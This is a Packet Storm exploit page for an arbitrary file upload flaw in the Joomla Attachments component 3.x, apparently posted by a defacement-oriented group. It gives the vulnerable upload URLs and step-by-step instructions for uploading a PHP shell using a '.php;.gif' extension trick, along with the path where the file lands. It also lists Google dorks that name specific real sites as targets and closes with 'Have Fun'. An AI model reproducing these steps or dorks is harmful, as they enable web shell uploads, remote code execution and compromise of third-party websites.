exploit the possibilities

Joomla Attachments 3.x File Upload

Joomla Attachments 3.x File Upload
Posted May 26, 2019
Authored by KingSkrupellos

Joomla Attachments component version 3.x suffers from a remote file upload vulnerability.

tags | exploit, remote, file upload
MD5 | bd20ed03288d4577ce8abcb06613d91d

Joomla Attachments 3.x File Upload

Change Mirror Download
####################################################################

# Exploit Title : Joomla Com_Attachments Components 3.x Arbitrary File Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 26/05/2019
# Vendor Homepage : jmcameron.net
# Software Download Links : jmcameron.net/attachments/
jmcameron.net/attachments/updates/3.2.6/attachments-3.2.6.zip
joomlacode.org/gf/download/frsrelease/18688/83852/attachments-2.2.2.zip
joomlacode.org/gf/project/attachments/frs/
github.com/sdc/DevonStudioSchool/tree/master/administrator/components/com_attachments/
# Software Information Links : extensions.joomla.org/extension/attachments/
joomlacode.org/gf/project/attachments/
joomlacode.org/gf/project/attachments3/
# Joomla Affected Versions :
Joomla 3.4.8
Joomla 3.5.1
Joomla 3.6.5
Joomla 3.8.1
Joomla 3.8.11
Joomla 3.8.3
Joomla 3.9.6
# Software Affected Versions [ Component Com_Attachments ] :
2.2.2 and 3.2.6 - 3.x / All previous versions.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks :
inurl:/index.php?option=com_attachments&task=upload
intext:Copyright (C) 2006-2020 BSA Troop 444. All Rights Reserved.
intext:Treadmill Desk from TrekDesk
intext:Copyright © 2015 Ashleigh-D. All rights reserved. Website designed by Mojosync Pty Ltd using Joomla
intext:Fundación Jesuitas Paraguay
intext:© 2019 Mars Society Polska
intext:Designed by atict.com
intext:Copyright © 2017. All Rights Reserved.Webaloss - Realizzazione siti webwebaloss.com
intext:Designed by Burosphere.
intext:Conselho Nacional de Recursos Hídricos CNRH Ministerio Do Desenvolvimento Regional
and more on Google and other Search Engines...... Have Fun....
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link [ Similar ] : dl.packetstormsecurity.net/1902-exploits/joomlaattachments326-shell.txt

####################################################################

# Description about Software :
***************************
The 'Attachments' extension allows files to be uploaded and attached to content
articles in Joomla. Includes a plugin to display attachments and a component
for uploading and managing attachments.

####################################################################

# Impact :
***********
Joomla Attachments Components 3.x and other previous versions could allow a
remote attacker to upload arbitrary files upload/shell upload, caused by the improper validation
of file extensions by the multiple scripts to index.php. The issue occurs because
the application fails to adequately sanitize user-supplied input.
Exploiting this issue will allow attackers to execute arbitrary code within
the context of the affected application. This may facilitate unauthorized access
or privilege escalation; other attacks may also possible.
By sending a specially-crafted HTTP request, a remote attacker could exploit
this vulnerability to upload a malicious PHP script, which could allow the
attacker to execute arbitrary PHP code on the vulnerable system.

####################################################################

# Arbitrary File Upload/Unauthorized File Insertion Exploit :
****************************************************
/index.php?option=com_attachments&task=upload&uri=file&parent_id=1&parent_type=com_content&tmpl=component&from=closeme

/index.php?option=com_attachments&task=upload&uri=file&parent_id=[ARTICLE-ID-NUMBER]/&parent_type=com_content&tmpl=component&from=closeme

Click to " Select file to upload instead " - Fill the Form - Published => '' Yes '' and Click " Public "

Attach file: - Upload your .txt .jpg .gif .png .phtml .php;.gif file to the vulnerable system.

# Directory File Path :
********************
/attachments/article/[ARTICLE-ID-NUMBER]/kingskrupellos.txt

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    6 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close